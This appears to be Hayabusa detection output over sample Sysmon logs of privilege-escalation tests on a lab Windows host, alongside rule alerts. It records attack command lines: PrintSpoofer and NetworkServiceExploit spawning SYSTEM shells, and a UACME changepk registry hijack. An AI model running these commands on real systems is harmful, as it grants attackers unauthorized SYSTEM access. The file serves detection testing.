+2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x1d39b | PID: 4600 | PGUID: 747F3D96-B76A-5EA4-0000-0010EEB50300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\Temp | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCache | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetHistory | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCookies | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc | LID: 0x1d39b | PID: 5840 | PGUID: 747F3D96-B76F-5EA4-0000-0010624D0600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6964 | PGUID: 747F3D96-B776-5EA4-0000-0010A74D0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x1d39b | PID: 7000 | PGUID: 747F3D96-B776-5EA4-0000-001006590B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 6656 | PGUID: 747F3D96-B79B-5EA4-0000-00105BD50F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 318 0000021FF2606500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6648 | PGUID: 747F3D96-B79B-5EA4-0000-001075DA0F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 748 | PGUID: 747F3D96-B79B-5EA4-0000-001001FC0F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Discovery - domain time | Cmd: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 | Process: C:\BGinfo\BGINFO.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 7056 | PGUID: 747F3D96-B7A0-5EA4-0000-001026D11000 | Hash: SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\SecurityHealthService.exe | Process: C:\Windows\System32\SecurityHealthService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 7088 | PGUID: 747F3D96-B7A0-5EA4-0000-001027D81000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x1d39b | PID: 3376 | PGUID: 747F3D96-B7A0-5EA4-0000-00108D131100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 864 | PGUID: 747F3D96-B7A2-5EA4-0000-0010982F1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 3256 | PGUID: 747F3D96-B7A5-5EA4-0000-0010CAB51300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 258 0000021FF266EC20 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7036 | PGUID: 747F3D96-B7A5-5EA4-0000-0010EAB91300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 4480 | PGUID: 747F3D96-B7AA-5EA4-0000-001066001700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2792 | PGUID: 747F3D96-B7D4-5EA4-0000-0010E09B1700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 6548 | PGUID: 747F3D96-B7DE-5EA4-0000-0010FA4E1800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 992 | PGUID: 747F3D96-B7DF-5EA4-0000-001052671800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1396 | PGUID: 747F3D96-B7DF-5EA4-0000-001080711800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-05-03 03:01:52.553 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 7212 | PGUID: 747F3D96-B49D-5EAD-0000-001029FEBE00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PrintSpoofer.exe -i -c powershell.exe | Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x812b1 | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: System | PID: 4 | PGUID: 747F3D96-6AB8-5EAD-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: powershell.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PrintSpoofer.exe -i -c powershell.exe | LID: 0x3e7 | PID: 1428 | PGUID: 747F3D96-B592-5EAD-0000-0010D4CDC200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe | LID: 0x3e7 | PID: 6004 | PGUID: 747F3D96-B595-5EAD-0000-00106BFDC200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-07 22:13:01.683 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - T1088 - UACBypass - changepk UACME61 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Launcher.SystemSettings\shell\open\command\(Default): c:\Windows\System32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 7084 | PGUID: 747F3D96-095D-5EB4-0000-001082FF1700,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
+2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\ChangePk.exe"" | LID: 0x2ecba | PID: 5216 | PGUID: 747F3D96-095E-5EB4-0000-0010D46F1800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
+2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | Process: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.647 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\frAQBc8Wsa1 | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.662 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\frAQBc8Wsa1 | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | LID: 0x3e7 | PID: 372 | PGUID: 747F3D96-4640-5EB7-0000-0010EF364B01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 7672 | PGUID: 747F3D96-4647-5EB7-0000-0010B3454B01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 180 | PGUID: 747F3D96-46A4-5EB7-0000-00109FE74C01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
